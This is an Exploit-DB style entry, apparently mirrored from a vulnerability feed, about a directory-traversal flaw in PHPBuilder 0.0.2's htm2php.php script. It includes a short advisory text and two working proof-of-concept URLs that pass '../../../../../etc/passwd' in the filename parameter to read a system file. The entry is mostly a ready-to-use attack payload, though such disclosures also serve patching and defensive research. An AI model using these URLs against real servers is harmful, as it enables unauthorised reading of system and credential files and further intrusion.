PHPBuilder 0.0.2 HTM2PHP.PHP Directory Traversal Vulnerability

2006-11-08T00:00:00
ID EDB-ID:29303
Type exploitdb
Reporter the master
Modified 2006-11-08T00:00:00

Description

PHPBuilder 0.0.2 HTM2PHP.PHP Directory Traversal Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/21703/info

PHPBuilder is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

A remote attacker could exploit this vulnerability to reveal the contents of files that contain sensitive information that could aid in further attacks against the affected computer.

PHPBuilder 0.0.2 is vulnerable to this issue; other versions may also be affected.

http://www.example.com/[Path]/lib/htm2php.php?filename=../../../../../etc/passwd
http://www.example.com/[Path]/sitetools/htm2php.php?filename=../../../../../etc/passwd